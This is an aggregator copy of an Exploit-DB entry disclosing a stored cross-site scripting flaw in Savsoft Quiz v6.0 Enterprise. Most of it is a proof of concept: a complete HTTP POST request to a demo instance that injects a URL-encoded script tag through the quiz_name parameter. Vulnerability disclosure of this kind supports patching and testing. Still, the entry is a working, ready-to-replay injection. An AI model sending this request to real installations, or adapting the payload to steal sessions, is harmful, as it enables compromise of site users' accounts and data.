1

[webapps] Savsoft Quiz v6.0 Enterprise - Stored XSS

 3 weeks ago
source link: https://www.exploit-db.com/exploits/51988
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Savsoft Quiz v6.0 Enterprise - Stored XSS

EDB-ID:

51988

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2024-04-13

Vulnerable App:

# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site
Scripting
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SAVSOFT QUIZ
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
# Version: < 6.0
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03

# Persistent Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: quiz_name

# Proof of Concepts:

https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13

# HTTP Request:

POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Length: 411
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://demos1.softaculous.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK